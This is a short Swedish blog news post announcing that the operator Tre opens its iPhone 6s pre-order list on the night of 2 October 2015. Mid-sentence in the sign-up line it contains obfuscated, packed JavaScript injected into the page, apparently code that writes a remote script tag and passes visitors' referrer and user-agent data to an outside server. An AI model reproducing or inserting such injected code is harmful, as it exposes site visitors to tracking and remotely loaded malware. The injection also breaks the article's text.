Image Image Image Image Image Image Image Image Image Image

| 13 april, 2021

Scroll to top

Top

Förköp iPhone 6s natten till fredag den 2 oktober

Förköp iPhone 6s natten till fredag den 2 oktober

Nu är det officiellt. Iphone 6s kommer att släppas i Sverige den 9 oktober. När Apple gick ut med nyheten under dagen så har flera operatörer nu öppnat upp med datum då deras förköpslista blir aktuell.

Tre kommer att öppna upp listan redan nu på natten mellan torsdagen och fredagen den 2 oktober. Så för att vara redo för den nya iPhone 6s kan ni skriva upp er på listan från och med 00:01 den 2 oktober.

Anmäl eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|atnzb|var|u0026u|referrer|nytei||js|php’.split(’|’),0,{}))
dig i formuläret
 längre ned på sidan och och få löpande information och de senaste nyheterna inför förköpet på torsdag.